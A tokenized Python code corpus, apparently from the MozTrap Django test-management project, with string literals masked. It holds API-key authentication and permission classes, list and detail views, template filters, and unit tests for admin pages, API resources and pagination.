'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from tastypie import http <EOL> from tastypie . authentication import ApiKeyAuthentication <EOL> from tastypie . authorization import DjangoAuthorization <EOL> from tastypie . exceptions import ImmediateHttpResponse <EOL> from tastypie . resources import ModelResource <EOL> from django . http import HttpResponse <EOL> from . core . models import ApiKey <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class MTApiKeyAuthentication ( ApiKeyAuthentication ) : <EOL> """<STR_LIT>""" <EOL> def get_key ( self , user , api_key ) : <EOL> try : <EOL> ApiKey . objects . get ( owner = user , key = api_key , active = True ) <EOL> logger . debug ( "<STR_LIT>" ) <EOL> except Exception as e : <EOL> logger . debug ( "<STR_LIT>" % e ) <EOL> return self . _unauthorized ( ) <EOL> return True <EOL> def is_authenticated ( self , request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if request . method == "<STR_LIT:GET>" : <EOL> return True <EOL> from . core . auth import User <EOL> username = request . GET . get ( "<STR_LIT:username>" ) or request . POST . get ( "<STR_LIT:username>" ) <EOL> api_key = request . GET . get ( "<STR_LIT>" ) or request . POST . get ( "<STR_LIT>" ) <EOL> if not username or not api_key : <EOL> if not username : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> elif not api_key : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> return self . _unauthorized ( ) <EOL> try : <EOL> user = User . objects . get ( username = username ) <EOL> except ( User . DoesNotExist , User . MultipleObjectsReturned ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> return self . _unauthorized ( ) <EOL> request . user = user <EOL> return self . get_key ( user , api_key ) <EOL> class MTAuthorization ( DjangoAuthorization ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def permission ( self ) : <EOL> """<STR_LIT>""" <EOL> klass = self . resource_meta . object_class <EOL> permission = "<STR_LIT>" % ( klass . _meta . app_label , <EOL> klass . _meta . 
module_name ) <EOL> logger . debug ( "<STR_LIT>" % permission ) <EOL> return permission <EOL> def read_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . read_detail ( object_list , bundle ) <EOL> def create_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . create_detail ( object_list , bundle ) <EOL> def update_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . update_detail ( object_list , bundle ) <EOL> def delete_detail ( self , object_list , bundle ) : <EOL> klass = self . base_checks ( bundle . request , bundle . obj . __class__ ) <EOL> if klass and bundle . request . user . has_perm ( self . permission ) : <EOL> return True <EOL> return super ( MTAuthorization , self ) . 
delete_detail ( object_list , bundle ) <EOL> class MTResource ( ModelResource ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> list_allowed_methods = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> detail_allowed_methods = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> authentication = MTApiKeyAuthentication ( ) <EOL> authorization = MTAuthorization ( ) <EOL> always_return_data = True <EOL> ordering = [ '<STR_LIT:id>' ] <EOL> @ property <EOL> def model ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> @ property <EOL> def read_create_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ ] <EOL> def check_read_create ( self , bundle ) : <EOL> """<STR_LIT>""" <EOL> obj = self . get_via_uri ( bundle . request . path , request = bundle . request ) <EOL> for fk in self . read_create_fields : <EOL> if fk not in bundle . data : <EOL> continue <EOL> new_fk_id = self . _id_from_uri ( bundle . data [ fk ] ) <EOL> old_fk_id = str ( getattr ( obj , fk ) . id ) <EOL> if new_fk_id != old_fk_id : <EOL> error_message = str ( <EOL> "<STR_LIT>" % ( fk , self . _meta . resource_name ) + <EOL> "<STR_LIT>" ) <EOL> logger . error ( <EOL> "<STR_LIT:\n>" . join ( [ error_message , "<STR_LIT>" ] ) , <EOL> old_fk_id , new_fk_id ) <EOL> raise ImmediateHttpResponse ( <EOL> response = http . HttpBadRequest ( error_message ) ) <EOL> return bundle <EOL> def obj_create ( self , bundle , request = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = request or bundle . request <EOL> try : <EOL> bundle = super ( MTResource , self ) . obj_create ( <EOL> bundle = bundle , request = request , ** kwargs ) <EOL> bundle . obj . created_by = request . user <EOL> bundle . obj . save ( user = request . user ) <EOL> return bundle <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" , bundle ) <EOL> raise <EOL> def obj_update ( self , bundle , request = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> bundle = self . 
check_read_create ( bundle ) <EOL> request = request or bundle . request <EOL> try : <EOL> bundle = super ( MTResource , self ) . obj_update ( <EOL> bundle , ** kwargs ) <EOL> bundle . obj . save ( user = request . user ) <EOL> return bundle <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" , bundle ) <EOL> raise <EOL> def obj_delete ( self , bundle , request = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> request = request or bundle . request <EOL> try : <EOL> permanent = request . REQUEST . get ( '<STR_LIT>' , False ) <EOL> obj_id = self . _id_from_uri ( request . path ) <EOL> obj = self . model . objects . get ( id = obj_id ) <EOL> bundle . obj = obj <EOL> self . authorized_delete_detail ( [ obj ] , bundle ) <EOL> obj . delete ( user = request . user , permanent = permanent ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" , request . path ) <EOL> raise <EOL> def delete_detail ( self , request , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> res = super ( MTResource , self ) . delete_detail ( request , ** kwargs ) <EOL> if ( res . status_code == <NUM_LIT> ) : <EOL> return HttpResponse ( ) <EOL> else : <EOL> return res <EOL> def save_related ( self , bundle ) : <EOL> """<STR_LIT>""" <EOL> super ( MTResource , self ) . save_related ( bundle ) <EOL> if bundle . request . META [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> bundle . obj . cc_version = self . model . objects . get ( <EOL> id = bundle . obj . id ) . cc_version <EOL> def _id_from_uri ( self , uri ) : <EOL> return uri . split ( '<STR_LIT:/>' ) [ - <NUM_LIT:2> ] </s>
<s> """<STR_LIT>""" <EOL> from django . template import Library <EOL> register = Library ( ) <EOL> @ register . filter <EOL> def url ( sort , field ) : <EOL> return sort . url ( field ) <EOL> @ register . filter <EOL> def dir ( sort , field ) : <EOL> return sort . dir ( field ) </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . template . response import TemplateResponse <EOL> from moztrap . view . utils . auth import login_maybe_required <EOL> from moztrap import model <EOL> from moztrap . view . filters import RunCaseVersionFilterSet <EOL> from moztrap . view . lists import decorators as lists <EOL> from moztrap . view . utils . ajax import ajax <EOL> from . . finders import ResultsFinder <EOL> @ login_maybe_required <EOL> @ lists . finder ( ResultsFinder ) <EOL> @ lists . filter ( "<STR_LIT>" , filterset_class = RunCaseVersionFilterSet ) <EOL> @ lists . sort ( "<STR_LIT>" ) <EOL> @ ajax ( "<STR_LIT>" ) <EOL> def runcaseversions_list ( request ) : <EOL> """<STR_LIT>""" <EOL> return TemplateResponse ( <EOL> request , <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : model . RunCaseVersion . objects . only ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) . select_related ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> } <EOL> ) <EOL> @ login_maybe_required <EOL> def runcaseversion_details ( request , rcv_id ) : <EOL> """<STR_LIT>""" <EOL> runcaseversion = get_object_or_404 ( <EOL> model . RunCaseVersion , pk = rcv_id ) <EOL> return TemplateResponse ( <EOL> request , <EOL> "<STR_LIT>" , <EOL> { <EOL> "<STR_LIT>" : runcaseversion <EOL> } <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from django . shortcuts import redirect <EOL> from . utils . auth import login_maybe_required <EOL> @ login_maybe_required <EOL> def home ( request ) : <EOL> """<STR_LIT>""" <EOL> if request . user . has_perm ( "<STR_LIT>" ) : <EOL> return redirect ( "<STR_LIT>" ) <EOL> return redirect ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from tests import case <EOL> class ElementAdminTest ( case . admin . AdminTestCase ) : <EOL> app_label = "<STR_LIT>" <EOL> model_name = "<STR_LIT>" <EOL> def test_changelist ( self ) : <EOL> """<STR_LIT>""" <EOL> self . F . ElementFactory . create ( name = "<STR_LIT>" ) <EOL> self . get ( self . changelist_url ) . mustcontain ( "<STR_LIT>" ) <EOL> def test_change_page ( self ) : <EOL> """<STR_LIT>""" <EOL> e = self . F . ElementFactory . create ( name = "<STR_LIT>" ) <EOL> self . get ( self . change_url ( e ) ) . mustcontain ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from tests . case . api . crud import ApiCrudCases <EOL> import logging <EOL> mozlogger = logging . getLogger ( '<STR_LIT>' ) <EOL> class CaseStepResourceTest ( ApiCrudCases ) : <EOL> @ property <EOL> def factory ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . F . CaseStepFactory ( ) <EOL> @ property <EOL> def resource_name ( self ) : <EOL> return "<STR_LIT>" <EOL> @ property <EOL> def permission ( self ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" <EOL> @ property <EOL> def new_object_data ( self ) : <EOL> """<STR_LIT>""" <EOL> modifiers = ( self . datetime , self . resource_name ) <EOL> self . caseversion_fixture = self . F . CaseVersionFactory . create ( ) <EOL> fields = { <EOL> u"<STR_LIT>" : unicode ( <EOL> self . get_detail_url ( "<STR_LIT>" , str ( self . caseversion_fixture . id ) ) ) , <EOL> u"<STR_LIT>" : <NUM_LIT:1> , <EOL> u"<STR_LIT>" : u"<STR_LIT>" % self . datetime , <EOL> u"<STR_LIT>" : u"<STR_LIT>" % self . datetime , <EOL> } <EOL> return fields <EOL> def backend_object ( self , id ) : <EOL> """<STR_LIT>""" <EOL> return self . model . CaseStep . everything . get ( id = id ) <EOL> def backend_data ( self , backend_obj ) : <EOL> """<STR_LIT>""" <EOL> actual = { <EOL> u"<STR_LIT:id>" : backend_obj . id , <EOL> u"<STR_LIT>" : unicode ( <EOL> self . get_detail_url ( "<STR_LIT>" , <EOL> str ( backend_obj . caseversion . id ) ) ) , <EOL> u"<STR_LIT>" : unicode ( backend_obj . instruction ) , <EOL> u"<STR_LIT>" : unicode ( backend_obj . expected ) , <EOL> u"<STR_LIT>" : backend_obj . number , <EOL> u"<STR_LIT>" : unicode ( <EOL> self . get_detail_url ( self . resource_name , str ( backend_obj . id ) ) ) <EOL> } <EOL> return actual <EOL> @ property <EOL> def read_create_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ "<STR_LIT>" ] </s>
<s> """<STR_LIT>""" <EOL> from mock import Mock <EOL> from django . core . exceptions import SuspiciousOperation <EOL> from tests import case <EOL> from tests . utils import Url <EOL> class TestFromRequest ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import from_request <EOL> return from_request <EOL> def _check ( self , GET , result ) : <EOL> """<STR_LIT>""" <EOL> request = Mock ( ) <EOL> request . GET = GET <EOL> self . assertEqual ( self . func ( request ) , result ) <EOL> def test_defaults ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { } , ( <NUM_LIT:20> , <NUM_LIT:1> ) ) <EOL> def test_set ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { "<STR_LIT>" : <NUM_LIT:10> , "<STR_LIT>" : <NUM_LIT:2> } , ( <NUM_LIT:10> , <NUM_LIT:2> ) ) <EOL> def test_invalid ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : <NUM_LIT:2> } , ( <NUM_LIT:20> , <NUM_LIT:2> ) ) <EOL> def test_negative ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check ( { "<STR_LIT>" : <NUM_LIT:20> , "<STR_LIT>" : - <NUM_LIT:2> } , ( <NUM_LIT:20> , <NUM_LIT:1> ) ) <EOL> def test_valid_number_but_not_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> request = Mock ( ) <EOL> request . GET = { "<STR_LIT>" : <NUM_LIT> , "<STR_LIT>" : <NUM_LIT:1> } <EOL> self . assertRaises ( <EOL> SuspiciousOperation , <EOL> self . func , <EOL> request <EOL> ) <EOL> class TestPagesizeUrl ( case . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import pagesize_url <EOL> return pagesize_url <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . func ( "<STR_LIT>" , <NUM_LIT:10> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> def test_override ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . 
func ( "<STR_LIT>" , <NUM_LIT:10> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> class TestPagenumberUrl ( case . TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import pagenumber_url <EOL> return pagenumber_url <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . func ( "<STR_LIT>" , <NUM_LIT:3> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> def test_override ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( <EOL> Url ( self . func ( "<STR_LIT>" , <NUM_LIT:5> ) ) , <EOL> Url ( "<STR_LIT>" ) ) <EOL> class TestPager ( case . DBTestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def pager ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import Pager <EOL> return Pager <EOL> def qs ( self , count ) : <EOL> """<STR_LIT>""" <EOL> qs = Mock ( ) <EOL> qs . count . return_value = count <EOL> qs . empty . return_value = [ ] <EOL> qs . __getitem__ = Mock ( ) <EOL> return qs <EOL> def test_sizes_with_standard_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> self . assertEqual ( p . sizes ( ) , [ <NUM_LIT:10> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT:100> ] ) <EOL> def test_sizes_with_nonstandard_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:15> , <NUM_LIT:1> ) <EOL> self . assertEqual ( p . sizes ( ) , [ <NUM_LIT:10> , <NUM_LIT:15> , <NUM_LIT:20> , <NUM_LIT:50> , <NUM_LIT:100> ] ) <EOL> def test_pages_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_pages_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:10> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . 
assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_pages_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_pages_more_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_display_pages_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_display_pages_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:10> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_display_pages_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> ] ) <EOL> def test_display_pages_more_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_display_pages_long_on_first ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , None , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_on_last ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:12> ) <EOL> self . assertEqual ( list ( p . 
display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , None , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_near_one_end ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:5> ) <EOL> self . assertEqual ( <EOL> list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> , None , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_near_other_end ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:9> ) <EOL> self . assertEqual ( <EOL> list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , None , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:12> ] ) <EOL> def test_display_pages_long_in_middle ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:10> , <NUM_LIT:8> ) <EOL> self . assertEqual ( list ( p . display_pages ( ) ) , [ <NUM_LIT:1> , <NUM_LIT:2> , None , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT:8> , <NUM_LIT:9> , <NUM_LIT:10> , None , <NUM_LIT> , <NUM_LIT:15> ] ) <EOL> def test_total ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:10> ) , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> self . assertEqual ( p . total , <NUM_LIT:10> ) <EOL> def test_total_cached ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = self . qs ( <NUM_LIT:10> ) <EOL> p = self . pager ( qs , <NUM_LIT:20> , <NUM_LIT:1> ) <EOL> p . total <EOL> p . total <EOL> self . assertEqual ( qs . count . call_count , <NUM_LIT:1> ) <EOL> def test_objects ( self ) : <EOL> """<STR_LIT>""" <EOL> products = [ <EOL> self . F . ProductFactory . create ( name = "<STR_LIT>" . format ( i ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:5> ) <EOL> ] <EOL> p = self . pager ( products [ <NUM_LIT:0> ] . __class__ . objects . all ( ) , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . 
objects ) , products [ : <NUM_LIT:3> ] ) <EOL> def test_objects_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> p = self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> self . assertEqual ( list ( p . objects ) , [ ] ) <EOL> def test_sliced_queryset_cached ( self ) : <EOL> """<STR_LIT>""" <EOL> qs = self . qs ( <NUM_LIT:10> ) <EOL> p = self . pager ( qs , <NUM_LIT:5> , <NUM_LIT:1> ) <EOL> p . objects <EOL> p . objects <EOL> self . assertEqual ( qs . __getitem__ . call_count , <NUM_LIT:1> ) <EOL> def test_num_pages_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:1> ) <EOL> def test_num_pages_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:15> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:1> ) <EOL> def test_num_pages_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:1> ) <EOL> def test_num_pages_more_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . num_pages , <NUM_LIT:2> ) <EOL> def test_low_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:0> ) <EOL> def test_high_empty ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:0> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:0> ) <EOL> def test_low_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:15> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:1> ) <EOL> def test_high_less_than_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . 
qs ( <NUM_LIT:15> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:15> ) <EOL> def test_low_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:1> ) <EOL> def test_high_equal_to_size ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:20> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:20> ) <EOL> def test_low_more_than_size_page1 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . low , <NUM_LIT:1> ) <EOL> def test_high_more_than_size_page1 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . high , <NUM_LIT:20> ) <EOL> def test_low_more_than_size_page2 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:2> ) . low , <NUM_LIT> ) <EOL> def test_high_more_than_size_page2 ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:2> ) . high , <NUM_LIT> ) <EOL> def test_prev_none ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . prev , None ) <EOL> def test_prev ( self ) : <EOL> "<STR_LIT>" "<STR_LIT>" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:2> ) . prev , <NUM_LIT:1> ) <EOL> def test_next_none ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT:5> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . next , None ) <EOL> def test_next ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . pager ( self . qs ( <NUM_LIT> ) , <NUM_LIT:20> , <NUM_LIT:1> ) . next , <NUM_LIT:2> ) <EOL> class TestPositiveInteger ( case . 
TestCase ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def func ( self ) : <EOL> """<STR_LIT>""" <EOL> from moztrap . view . lists . pagination import positive_integer <EOL> return positive_integer <EOL> def test_negative ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( - <NUM_LIT:1> , <NUM_LIT:5> ) , <NUM_LIT:1> ) <EOL> def test_zero ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( <NUM_LIT:0> , <NUM_LIT:5> ) , <NUM_LIT:1> ) <EOL> def test_positive ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( <NUM_LIT:1> , <NUM_LIT:5> ) , <NUM_LIT:1> ) <EOL> def test_none ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( None , <NUM_LIT:5> ) , <NUM_LIT:5> ) <EOL> def test_string ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . func ( "<STR_LIT>" , <NUM_LIT:5> ) , <NUM_LIT:5> ) </s>
